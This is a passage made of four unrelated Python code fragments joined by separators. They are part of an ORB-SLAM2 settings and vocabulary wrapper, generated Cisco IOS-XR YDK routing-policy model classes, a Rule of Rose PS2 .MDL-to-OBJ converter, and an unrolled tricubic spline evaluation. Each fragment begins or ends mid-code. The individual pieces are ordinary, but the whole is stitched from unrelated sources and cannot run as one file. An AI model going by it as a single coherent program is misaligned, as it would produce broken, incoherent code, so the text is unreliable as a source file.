vocabulary_file=vocabulary_file,
vocabulary_branching_factor=int(vocabulary_branching_factor),
vocabulary_depth=int(vocabulary_depth),
vocabulary_seed=int(vocabulary_seed),
depth_threshold=float(depth_threshold),
orb_num_features=int(orb_num_features),
orb_scale_factor=float(orb_scale_factor),
orb_num_levels=int(orb_num_levels),
orb_ini_threshold_fast=int(orb_ini_threshold_fast),
orb_min_threshold_fast=int(orb_min_threshold_fast)
)
return obj
def save_settings(self):
if self._settings_file is None:
if self._temp_folder is None:
raise RuntimeError("Cannot save settings, no configured temporary directory")
if self._intrinsics is None:
raise RuntimeError("Cannot save settings without the camera intrinsics")
# Build the settings object
orbslam_settings = {
'Camera': {
# Camera calibration and distortion parameters (OpenCV)
# Most of these get overridden with the camera intrinsics at the start of the run.
'fx': self._intrinsics.fx,
'fy': self._intrinsics.fy,
'cx': self._intrinsics.cx,
'cy': self._intrinsics.cy,
'k1': self._intrinsics.k1,
'k2': self._intrinsics.k2,
'p1': self._intrinsics.p1,
'p2': self._intrinsics.p2,
'k3': self._intrinsics.k3,
'width': self._intrinsics.width,
'height': self._intrinsics.height,
# Camera frames per second
'fps': self._framerate,
# Color order of the images (0: BGR, 1: RGB. It is ignored if images are grayscale)
# All the images in this system will be greyscale anyway
'RGB': 1
},
# Close/Far threshold. Baseline times. I don't know what this does.
'ThDepth': self.depth_threshold,
# Depthmap values factor (all my depth is in meters, rescaling is handled elsewhere)
'DepthMapFactor': 1.0,
'ORBextractor': {
# ORB Extractor: Number of features per image
'nFeatures': self.orb_num_features,
# ORB Extractor: Scale factor between levels in the scale pyramid
'scaleFactor': self.orb_scale_factor,
# ORB Extractor: Number of levels in the scale pyramid
'nLevels': self.orb_num_levels,
# ORB Extractor: Fast threshold
# Image is divided in a grid. At each cell FAST are extracted imposing a minimum response.
# Firstly we impose iniThFAST. If no corners are detected we impose a lower value minThFAST
# You can lower these values if your images have low contrast
'iniThFAST': self.orb_ini_threshold_fast,
'minThFAST': self.orb_min_threshold_fast
},
# Viewer configuration expected by ORB_SLAM2
# Since the viewer is disabled, these values don't matter, but need to exist
'Viewer': {
'KeyFrameSize': 0.05,
'KeyFrameLineWidth': 1,
'GraphLineWidth': 0.9,
'PointSize': 2,
'CameraSize': 0.08,
'CameraLineWidth': 3,
'ViewpointX': 0,
'ViewpointY': -0.7,
'ViewpointZ': -1.8,
'ViewpointF': 500
}
}
if self.mode is SensorMode.STEREO:
if self._stereo_baseline is not None:
# stereo baseline times fx
orbslam_settings['Camera']['bf'] = float(self._stereo_baseline * self._intrinsics.fx)
else:
raise RuntimeError("Cannot save stereo settings without a stereo baseline")
# Choose a new settings file, using mkstemp to avoid collisions
_, self._settings_file = tempfile.mkstemp(
prefix='orb-slam2-settings-{0}-'.format(self.pk if self.pk is not None else 'unregistered'),
suffix='.yaml',
dir=self._temp_folder
)
self._settings_file = Path(self._settings_file)
dump_config(self._settings_file, orbslam_settings)
def remove_settings(self) -> None:
"""
Get rid of the settings file after creating it using save_settings
:return:
"""
if self._settings_file is not None:
if self._settings_file.exists():
self._settings_file.unlink()
self._settings_file = None
def build_vocabulary(self, image_sources: typing.Iterable[ImageSource], output_folder: Path,
force: bool = False, change_threshold: float = 0.6, z_depth: float = 1.0) -> None:
"""
Construct a vocabulary file
:param image_sources: The image sources to use to build the vocabulary.
:param output_folder: A folder to output the vocabulary file to. Get this from the path manager.
:param force: Build even if the file already exists
:param change_threshold: The IoU between successive views that are considered distinct.
Used to reduce the number of duplicate features given to the vocabulary.
:param z_depth: The assumed z-depth when reprojecting image frames to work out overlap.
:return: None
"""
output_filename = None
if self.vocabulary_file is not None and len(self.vocabulary_file) > 0:
# Use the existing filename within whatever folder as the filename
output_filename = self.vocabulary_file.split('/')[-1]
if output_filename is None or len(output_filename) <= 0:
if self.pk is not None:
output_filename = VOCABULARY_FILENAME_TEMPLATE.format(self.pk)
else:
raise ValueError("Could not choose a name for the vocabulary file. Please save the model and try again")
output_path = output_folder / VOCABULARY_FOLDER / output_filename
if force or not output_path.exists():
vocab_builder = VocabularyBuilder(
self.orb_num_features, # Number of ORB features from the detector
self.orb_scale_factor, # Scale factor for the ORB scale pyramid
self.orb_num_levels, # Number of levels in the ORB scale pyramid
31, # Edge threshold, matches patch size
0, # First level
2, # WTA_K=2, that is, use 2 point to determine descriptor elements
1, # ScoreType = ORB::FAST_SCORE
31, # Patch size, matching the constant in OrbExtractor.cc
min(self.orb_ini_threshold_fast, self.orb_min_threshold_fast) # The lower FAST threshold
)
images_added = 0
logging.getLogger(__name__).debug("Building ORB vocab...")
for image_source in image_sources:
current_image = None
for timestamp, image in image_source:
# Make sure successive images are at least a little different
if current_image is None or find_percentage_overlap(current_image, image,
z_depth) < change_threshold:
grey_image = image_utils.convert_to_grey(image.pixels)
vocab_builder.add_image(grey_image)
current_image = image
images_added += 1
if images_added < 10:
raise ValueError("Could not find enough images with threshold {0}".format(change_threshold))
logging.getLogger(__name__).debug(
"Created ORB vocabulary from {0} images, saving to {1}...".format(images_added, output_path))
output_path.parent.mkdir(parents=True, exist_ok=True)
# Construct the vocabulary file
vocab_builder.build_vocabulary(
str(output_path),
branchingFactor=int(self.vocabulary_branching_factor),
numLevels=int(self.vocabulary_depth),
seed=int(self.vocabulary_seed)
)
# Update the stored vocabulary file to point to the newly build file.
self.vocabulary_file = VOCABULARY_FOLDER + '/' + output_filename
def _stop_subprocess(self, terminate: bool = False, timeout: float = 5.0) -> None:
"""
Stop the subprocess, by any means necessary.
:param terminate: Whether to open with SIGTERM before trying to join, do when you know it's crashed.
:return:
"""
if self._child_process:
if terminate:
self._child_process.terminate()
self._child_process.join(timeout=timeout)
if not terminate and self._child_process.is_alive():
# we didn't terminate before, but we've been unable to join, send sig-term
self._child_process.terminate()
self._child_process.join(timeout=timeout)
if self._child_process.is_alive():
# We've timed out after | |
set is
attached
.. attribute:: binding
bindings list
**type**\: list of :py:class:`Binding <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Sets.ExtendedCommunitySegNh.Sets_.Set.Attached.Binding>`
"""
_prefix = 'policy-repository-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.binding = YList()
self.binding.parent = self
self.binding.name = 'binding'
class Binding(object):
"""
bindings list
.. attribute:: af_name
Address Family Identifier
**type**\: :py:class:`AddressFamilyEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.AddressFamilyEnum>`
.. attribute:: aggregate_network_address
Aggregate IP address or Network IP Address in IPv4 or IPv6 Format
**type**\: str
.. attribute:: area_id
OSPF Area ID in Decimal Integer Format
**type**\: str
.. attribute:: attach_point
Name of attach point where policy is attached
**type**\: str
.. attribute:: attached_policy
The attached policy that (maybe indirectly) uses the object in question
**type**\: str
.. attribute:: direction
Direction In or Out
**type**\: :py:class:`AttachPointDirectionEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.AttachPointDirectionEnum>`
.. attribute:: group
Neighbor Group
**type**\: :py:class:`GroupEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.GroupEnum>`
.. attribute:: group_name
Neighbor Group Name
**type**\: str
.. attribute:: instance
Instance
**type**\: str
.. attribute:: interface_name
Interface Name
**type**\: str
.. attribute:: neighbor_address
Neighbor IP Address
**type**\: str
.. attribute:: neighbor_af_name
Neighbor IP Address Family
**type**\: :py:class:`AddressFamilyEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.AddressFamilyEnum>`
.. attribute:: propogate_from
ISIS Propogate From Level
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: propogate_to
ISIS Propogate To Level
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: proto_instance
Protocol instance
**type**\: str
.. attribute:: protocol
Protocol to which policy attached
**type**\: str
.. attribute:: route_policy_name
Policy that uses object in question
**type**\: str
.. attribute:: saf_name
Subsequent Address Family Identifier
**type**\: :py:class:`SubAddressFamilyEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.SubAddressFamilyEnum>`
.. attribute:: source_protocol
Source Protocol to redistribute, Source Protocol can be one of the following values {all, connected, local, static, bgp, rip, isis, ospf, ospfv3, eigrp, unknown }
**type**\: str
.. attribute:: vrf_name
VRF name
**type**\: str
"""
_prefix = 'policy-repository-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.af_name = None
self.aggregate_network_address = None
self.area_id = None
self.attach_point = None
self.attached_policy = None
self.direction = None
self.group = None
self.group_name = None
self.instance = None
self.interface_name = None
self.neighbor_address = None
self.neighbor_af_name = None
self.propogate_from = None
self.propogate_to = None
self.proto_instance = None
self.protocol = None
self.route_policy_name = None
self.saf_name = None
self.source_protocol = None
self.vrf_name = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-policy-repository-oper:binding'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.af_name is not None:
return True
if self.aggregate_network_address is not None:
return True
if self.area_id is not None:
return True
if self.attach_point is not None:
return True
if self.attached_policy is not None:
return True
if self.direction is not None:
return True
if self.group is not None:
return True
if self.group_name is not None:
return True
if self.instance is not None:
return True
if self.interface_name is not None:
return True
if self.neighbor_address is not None:
return True
if self.neighbor_af_name is not None:
return True
if self.propogate_from is not None:
return True
if self.propogate_to is not None:
return True
if self.proto_instance is not None:
return True
if self.protocol is not None:
return True
if self.route_policy_name is not None:
return True
if self.saf_name is not None:
return True
if self.source_protocol is not None:
return True
if self.vrf_name is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta
return meta._meta_table['RoutingPolicy.Sets.ExtendedCommunitySegNh.Sets_.Set.Attached.Binding']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-policy-repository-oper:attached'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.binding is not None:
for child_ref in self.binding:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta
return meta._meta_table['RoutingPolicy.Sets.ExtendedCommunitySegNh.Sets_.Set.Attached']['meta_info']
@property
def _common_path(self):
if self.set_name is None:
raise YPYModelError('Key property set_name is None')
return '/Cisco-IOS-XR-policy-repository-oper:routing-policy/Cisco-IOS-XR-policy-repository-oper:sets/Cisco-IOS-XR-policy-repository-oper:extended-community-seg-nh/Cisco-IOS-XR-policy-repository-oper:sets/Cisco-IOS-XR-policy-repository-oper:set[Cisco-IOS-XR-policy-repository-oper:set-name = ' + str(self.set_name) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.set_name is not None:
return True
if self.attached is not None and self.attached._has_data():
return True
if self.used_by is not None and self.used_by._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta
return meta._meta_table['RoutingPolicy.Sets.ExtendedCommunitySegNh.Sets_.Set']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-policy-repository-oper:routing-policy/Cisco-IOS-XR-policy-repository-oper:sets/Cisco-IOS-XR-policy-repository-oper:extended-community-seg-nh/Cisco-IOS-XR-policy-repository-oper:sets'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.set is not None:
for child_ref in self.set:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta
return meta._meta_table['RoutingPolicy.Sets.ExtendedCommunitySegNh.Sets_']['meta_info']
class Unused(object):
"""
All objects of a given type that are not
referenced at all
.. attribute:: object
Policy objects
**type**\: list of str
"""
_prefix = 'policy-repository-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.object = YLeafList()
self.object.parent = self
self.object.name = 'object'
@property
def _common_path(self):
return '/Cisco-IOS-XR-policy-repository-oper:routing-policy/Cisco-IOS-XR-policy-repository-oper:sets/Cisco-IOS-XR-policy-repository-oper:extended-community-seg-nh/Cisco-IOS-XR-policy-repository-oper:unused'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.object is not None:
for child in self.object:
if child is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta
return meta._meta_table['RoutingPolicy.Sets.ExtendedCommunitySegNh.Unused']['meta_info']
class Inactive(object):
"""
All objects of a given type that are not
attached to a protocol
.. attribute:: object
Policy objects
**type**\: list of str
"""
_prefix = 'policy-repository-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.object = YLeafList()
self.object.parent = self
self.object.name = 'object'
@property
def _common_path(self):
return '/Cisco-IOS-XR-policy-repository-oper:routing-policy/Cisco-IOS-XR-policy-repository-oper:sets/Cisco-IOS-XR-policy-repository-oper:extended-community-seg-nh/Cisco-IOS-XR-policy-repository-oper:inactive'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.object is not None:
for child in self.object:
if child is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta
return meta._meta_table['RoutingPolicy.Sets.ExtendedCommunitySegNh.Inactive']['meta_info']
class Active(object):
"""
All objects of a given type that are attached to
a protocol
.. attribute:: object
Policy objects
**type**\: list of str
"""
_prefix = 'policy-repository-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.object = YLeafList()
self.object.parent = self
self.object.name = 'object'
@property
def _common_path(self):
return '/Cisco-IOS-XR-policy-repository-oper:routing-policy/Cisco-IOS-XR-policy-repository-oper:sets/Cisco-IOS-XR-policy-repository-oper:extended-community-seg-nh/Cisco-IOS-XR-policy-repository-oper:active'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.object is not None:
for child in self.object:
if child is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta
return meta._meta_table['RoutingPolicy.Sets.ExtendedCommunitySegNh.Active']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-policy-repository-oper:routing-policy/Cisco-IOS-XR-policy-repository-oper:sets/Cisco-IOS-XR-policy-repository-oper:extended-community-seg-nh'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.active is not None and self.active._has_data():
return True
if self.inactive is not None and self.inactive._has_data():
return True
if self.sets is not None and self.sets._has_data():
return True
if self.unused is not None and self.unused._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta
return meta._meta_table['RoutingPolicy.Sets.ExtendedCommunitySegNh']['meta_info']
class ExtendedCommunitySoo(object):
"""
Information about Extended Community SOO sets
.. attribute:: active
All objects of a given type that are attached to a protocol
**type**\: :py:class:`Active <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Sets.ExtendedCommunitySoo.Active>`
.. attribute:: inactive
All objects of a given type that are not attached to a protocol
**type**\: :py:class:`Inactive <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Sets.ExtendedCommunitySoo.Inactive>`
.. attribute:: sets
Information about individual sets
**type**\: :py:class:`Sets_ <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Sets.ExtendedCommunitySoo.Sets_>`
.. attribute:: unused
All objects of a given type that are not referenced at all
**type**\: :py:class:`Unused <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Sets.ExtendedCommunitySoo.Unused>`
"""
_prefix = 'policy-repository-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
| |
# Converts a Rule of Rose (PS2) I3D model file (.MDL) to OBJ.
import argparse
import argparse
import math
import numpy as np
import os
import sys
import struct
parser = argparse.ArgumentParser(description='''
Converts a Rule of Rose (PS2) I3D model file (.MDL) to OBJ.
''')
def err(msg):
print("Error: {}".format(msg))
sys.exit(1)
def getuint16(b, offs = 0):
return struct.unpack('<H', b[offs:offs+2])[0]
def getnuint16(b, offs, n):
return struct.unpack('<' + 'H'*n, b[offs:offs+2*n])
def getuint32(b, offs = 0):
return struct.unpack('<I', b[offs:offs+4])[0]
def getfloat32(b, offs):
return struct.unpack('<f', b[offs:offs+4])[0]
def getnfloat32(b, offs, n):
return struct.unpack('<' + 'f'*n, b[offs:offs+4*n])
parser.add_argument('mdlpath', help='Input path of .MDL file', nargs=1)
args = parser.parse_args()
if len(args.mdlpath[0]) == 0:
parser.print_usage()
sys.exit(1)
# Extracts a file from an RPK archive with the given index.
def ReadRpkFile(f, index):
f.seek(0)
header = f.read(0x20)
if header[:4] != b'RTPK':
err("Not an RTPK archive!")
numfiles = getuint16(header, 0xE)
if index < 0 or index >= numfiles:
err("File index {} out of range in RTPK archive".format(index))
totalsize = getuint32(header, 0x4)
filesize = 0
fileoffs = 0
if header[0xA] == 0x2: # Offset table only
f.seek(index * 0x4 + 0x20)
fileoffs = getuint32(f.read(4))
if index == numfiles - 1:
filesize = totalsize - fileoffs
else:
filesize = getuint32(f.read(4)) - fileoffs
elif header[0xA] == 0x3: # Size and offset tables
f.seek(index * 0x4 + 0x20)
filesize = getuint32(f.read(4))
f.seek((numfiles + index) * 4 + 0x20)
fileoffs = getuint32(f.read(4))
f.seek(fileoffs)
return f.read(filesize)
class Node:
def __init__(self, buf, offs):
self.dataOffs = getuint32(buf, offs)
self.dataType = buf[offs + 0x7] & 0x7F
self.children = []
numChildren = getuint16(buf, offs + 0x4)
firstChildOffs = getuint32(buf, offs + 0x8)
for i in range(numChildren):
self.children.append(Node(buf, firstChildOffs + i * 0x10))
def getChildrenByType(self, dataType):
result = []
for child in self.children:
result += child.getChildrenByType(dataType)
if self.dataType == dataType:
result = [self] + result
return result
def parseName(buf, offs):
endOffs = offs
while buf[endOffs] != 0:
endOffs += 1
return buf[offs:endOffs].decode(encoding='ascii')
class SubmeshPiece:
def __init__(self, offs):
self.offs = offs
self.vtx = []
self.vt = []
self.vn = []
self.ind = []
class Submesh:
def __init__(self, offs, materialIndex):
self.offs = offs
self.materialIndex = materialIndex
self.submeshPieces = []
class Mesh:
def __init__(self, offs):
self.offs = offs
self.submeshes = []
class MeshInstance:
def __init__(self, offs, combinedMeshOffs):
self.offs = offs
self.combinedMeshOffs = combinedMeshOffs
self.meshes = []
vumem = [[0, 0, 0, 0] for _ in range(0x1000)] # VU1 memory is 16K bytes
def parseVif(buf, offs):
endoffs = offs + (buf[offs + 0x4] << 4) + 0x10
offs += 0x10
vif_r = [0, 0, 0, 0] # Can I assume this?
vif_c = [1, 1, 1, 1] # Pretty sure I can assume this at least
cl = 1
wl = 1
mask = [0 for _ in range(16)]
def maybe_mask_value(val, index, cycle, use_mask):
if not use_mask or mask[index] == 0b00:
return val
if mask[index + min(cycle, 3) * 4] == 0b01:
return vif_r[index]
if mask[index + min(cycle, 3) * 4] == 0b10:
return vif_c[min(3, cycle)]
return 0
while offs < endoffs:
imm, qwd, cmd = struct.unpack('<HBB', buf[offs:offs+4])
cmd &= 0x7F
offs += 4
if cmd == 0b00000000: # NOP
continue
elif cmd == 0b00000001: # STCYCLE
cl = imm & 0xFF
wl = (imm >> 8) & 0xFF
elif cmd == 0b00110000: # STROW
vif_r = getnfloat32(buf, offs, 4)
offs += 0x10
elif cmd == 0b00110001: # STCOL
vif_c = getnfloat32(buf, offs, 4)
offs += 0x10
elif cmd == 0b00100000: # STMASK
m = getuint32(buf, offs)
mask = [((m >> (i << 1)) & 0x3) for i in range(16)]
offs += 4
elif cmd >> 5 == 0b11: # UNPACK
# NOTE: This has to handle both skipping writes (cl >= wl) and filling writes (cl < wl)!
addr = imm & 0x3FF
vnvl = cmd & 0xF
m = (cmd & 0x10) > 0
j = 0
if vnvl == 0b0000: # S-32
width = 4
for i in range(qwd):
val = 0
if cl >= wl or (i % wl) < cl:
val = getfloat32(buf, width * j + offs)
j += 1
addroffs = cl * (i // wl) + (i % wl) if cl >= wl else 0
vumem[addr + addroffs] = [
maybe_mask_value(val, 0, i, m),
maybe_mask_value(val, 1, i, m),
maybe_mask_value(val, 2, i, m),
maybe_mask_value(val, 3, i, m),
]
elif vnvl == 0b0100: # V2-32
width = 8
for i in range(qwd):
val = [0, 0]
if cl >= wl or (i % wl) < cl:
val = getnfloat32(buf, width * j + offs, 2)
j += 1
addroffs = cl * (i // wl) + (i % wl) if cl >= wl else 0
vumem[addr + addroffs] = [
maybe_mask_value(val[0], 0, i, m),
maybe_mask_value(val[1], 1, i, m),
maybe_mask_value(0, 2, i, m),
maybe_mask_value(0, 3, i, m),
]
elif vnvl == 0b1000: # V3-32
width = 12
for i in range(qwd):
val = [0, 0, 0]
if cl >= wl or (i % wl) < cl:
val = getnfloat32(buf, width * j + offs, 3)
j += 1
addroffs = cl * (i // wl) + (i % wl) if cl >= wl else 0
vumem[addr + addroffs] = [
maybe_mask_value(val[0], 0, i, m),
maybe_mask_value(val[1], 1, i, m),
maybe_mask_value(val[2], 2, i, m),
maybe_mask_value(0, 3, i, m),
]
elif vnvl == 0b1100: # V4-32
width = 16
for i in range(qwd):
val = [0, 0, 0, 0]
if cl >= wl or (i % wl) < cl:
val = getnfloat32(buf, width * j + offs, 4)
j += 1
addroffs = cl * (i // wl) + (i % wl) if cl >= wl else 0
vumem[addr + addroffs] = [
maybe_mask_value(val[0], 0, i, m),
maybe_mask_value(val[1], 1, i, m),
maybe_mask_value(val[2], 2, i, m),
maybe_mask_value(val[3], 3, i, m),
]
else:
err('Unsupported unpack vnvl {} at offset {}'.format(hex(vnvl), hex(offs)))
offs += j * width
else:
err('Unrecognized vifcmd {} at offset {}'.format(hex(cmd), hex(offs)))
if __name__ == '__main__':
if not os.path.exists(args.mdlpath[0]):
err("Path not found: {}".format(args.mdlpath[0]))
mdlpath = sys.argv[1] if sys.argv[1][0] != '-' else args.mdlpath[0] # Drag-and-drop hack
basepath = os.path.splitext(mdlpath)[0]
basename = os.path.splitext(os.path.basename(mdlpath))[0]
f = open(mdlpath, 'rb')
buf = ReadRpkFile(f, 1)[0x10:]
f.close()
if len(buf) < 0x10:
err('MDL model file is too small! {} bytes'.format(len(buf)))
# Construct the entire node tree recursively.
rootNode = Node(buf, 0)
# Traverse node tree and find all nodes of interest.
materialNodes = rootNode.getChildrenByType(0x25)
combinedMeshNodes = rootNode.getChildrenByType(0x2D)
boneNodes = rootNode.getChildrenByType(0x2A)
# Get all material names. Assume these are the same as texture names.
materialNames = []
for materialNode in materialNodes:
materialOffs = materialNode.children[0].children[0].dataOffs
nameOffs = getuint32(buf, materialOffs + 0x18) + materialOffs
materialNames.append(parseName(buf, nameOffs))
# Parse mesh instances attached to bones.
meshInstances = []
for boneIndex in range(len(boneNodes)):
meshInstanceNodes = boneNodes[boneIndex].getChildrenByType(0x59)
if len(meshInstanceNodes) == 0:
continue
def getTransform(buf, offs, ind):
transformOffs = offs + ind * 0x40
matrix = []
for i in range(4):
matrix += [[getfloat32(buf, transformOffs + i * 0x10 + j * 0x4) for j in range(4)]]
return np.matrix(matrix).transpose()
# Get global transform of current bone.
transformTableOffs = getuint32(buf, rootNode.dataOffs + 0x14) + rootNode.dataOffs
baseTransform = getTransform(buf, transformTableOffs, boneIndex)
for meshInstanceNode in meshInstanceNodes:
# Parse mesh instance data.
boneListOffs = getuint32(buf, meshInstanceNode.dataOffs) + meshInstanceNode.dataOffs
combinedMeshIndex = getuint16(buf, meshInstanceNode.dataOffs + 0x4)
boneListCount = getuint16(buf, meshInstanceNode.dataOffs + 0x6)
boneList = getnuint16(buf, boneListOffs, boneListCount)
combinedMeshNode = combinedMeshNodes[combinedMeshIndex]
meshInstance = MeshInstance(meshInstanceNode.dataOffs, combinedMeshNode.dataOffs)
meshInstances.append(meshInstance)
bindPoseTableOffs = 0
if combinedMeshNode.children[0].dataOffs > 0: # Node type 0x46
# Sadly I can't compute a single transform for the entire combined mesh
# since different meshes may have different relative bind poses.
bindPoseTableOffs = getuint32(buf, combinedMeshNode.children[0].dataOffs) + combinedMeshNode.children[0].dataOffs
meshNodes = combinedMeshNode.getChildrenByType(0x4B)
meshNodes += combinedMeshNode.getChildrenByType(0x4C)
for meshNode in meshNodes:
mesh = Mesh(meshNode.dataOffs)
meshInstance.meshes.append(mesh)
transform = baseTransform
if meshNode.dataType == 0x4C and (buf[meshNode.dataOffs + 0x5] & 0x8) > 0:
# Use global transform of bone assigned to the instance.
boneListIndex = getuint16(buf, meshNode.dataOffs + 0x8)
transform = getTransform(buf, transformTableOffs, boneList[boneListIndex])
for submeshNode in meshNode.getChildrenByType(0x4D):
materialIndex = buf[submeshNode.dataOffs + 0xC]
submesh = Submesh(submeshNode.dataOffs, materialIndex)
mesh.submeshes.append(submesh)
for submeshPieceNode in submeshNode.getChildrenByType(0x56):
submeshPiece = SubmeshPiece(submeshPieceNode.dataOffs)
submesh.submeshPieces.append(submeshPiece)
vertexWeightNodes = submeshPieceNode.getChildrenByType(0x31)
if vertexWeightNodes and bindPoseTableOffs | |
tp2_2
+ Ad[3, 3] * tp2_3
)
values[n] = (
Phi0_0
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 0, i1 + 0, i2 + 0])
+ Phi2_1 * (coefs[i0 + 0, i1 + 0, i2 + 1])
+ Phi2_2 * (coefs[i0 + 0, i1 + 0, i2 + 2])
+ Phi2_3 * (coefs[i0 + 0, i1 + 0, i2 + 3])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 0, i1 + 1, i2 + 0])
+ Phi2_1 * (coefs[i0 + 0, i1 + 1, i2 + 1])
+ Phi2_2 * (coefs[i0 + 0, i1 + 1, i2 + 2])
+ Phi2_3 * (coefs[i0 + 0, i1 + 1, i2 + 3])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 0, i1 + 2, i2 + 0])
+ Phi2_1 * (coefs[i0 + 0, i1 + 2, i2 + 1])
+ Phi2_2 * (coefs[i0 + 0, i1 + 2, i2 + 2])
+ Phi2_3 * (coefs[i0 + 0, i1 + 2, i2 + 3])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 0, i1 + 3, i2 + 0])
+ Phi2_1 * (coefs[i0 + 0, i1 + 3, i2 + 1])
+ Phi2_2 * (coefs[i0 + 0, i1 + 3, i2 + 2])
+ Phi2_3 * (coefs[i0 + 0, i1 + 3, i2 + 3])
)
)
+ Phi0_1
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 1, i1 + 0, i2 + 0])
+ Phi2_1 * (coefs[i0 + 1, i1 + 0, i2 + 1])
+ Phi2_2 * (coefs[i0 + 1, i1 + 0, i2 + 2])
+ Phi2_3 * (coefs[i0 + 1, i1 + 0, i2 + 3])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 1, i1 + 1, i2 + 0])
+ Phi2_1 * (coefs[i0 + 1, i1 + 1, i2 + 1])
+ Phi2_2 * (coefs[i0 + 1, i1 + 1, i2 + 2])
+ Phi2_3 * (coefs[i0 + 1, i1 + 1, i2 + 3])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 1, i1 + 2, i2 + 0])
+ Phi2_1 * (coefs[i0 + 1, i1 + 2, i2 + 1])
+ Phi2_2 * (coefs[i0 + 1, i1 + 2, i2 + 2])
+ Phi2_3 * (coefs[i0 + 1, i1 + 2, i2 + 3])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 1, i1 + 3, i2 + 0])
+ Phi2_1 * (coefs[i0 + 1, i1 + 3, i2 + 1])
+ Phi2_2 * (coefs[i0 + 1, i1 + 3, i2 + 2])
+ Phi2_3 * (coefs[i0 + 1, i1 + 3, i2 + 3])
)
)
+ Phi0_2
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 2, i1 + 0, i2 + 0])
+ Phi2_1 * (coefs[i0 + 2, i1 + 0, i2 + 1])
+ Phi2_2 * (coefs[i0 + 2, i1 + 0, i2 + 2])
+ Phi2_3 * (coefs[i0 + 2, i1 + 0, i2 + 3])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 2, i1 + 1, i2 + 0])
+ Phi2_1 * (coefs[i0 + 2, i1 + 1, i2 + 1])
+ Phi2_2 * (coefs[i0 + 2, i1 + 1, i2 + 2])
+ Phi2_3 * (coefs[i0 + 2, i1 + 1, i2 + 3])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 2, i1 + 2, i2 + 0])
+ Phi2_1 * (coefs[i0 + 2, i1 + 2, i2 + 1])
+ Phi2_2 * (coefs[i0 + 2, i1 + 2, i2 + 2])
+ Phi2_3 * (coefs[i0 + 2, i1 + 2, i2 + 3])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 2, i1 + 3, i2 + 0])
+ Phi2_1 * (coefs[i0 + 2, i1 + 3, i2 + 1])
+ Phi2_2 * (coefs[i0 + 2, i1 + 3, i2 + 2])
+ Phi2_3 * (coefs[i0 + 2, i1 + 3, i2 + 3])
)
)
+ Phi0_3
* (
Phi1_0
* (
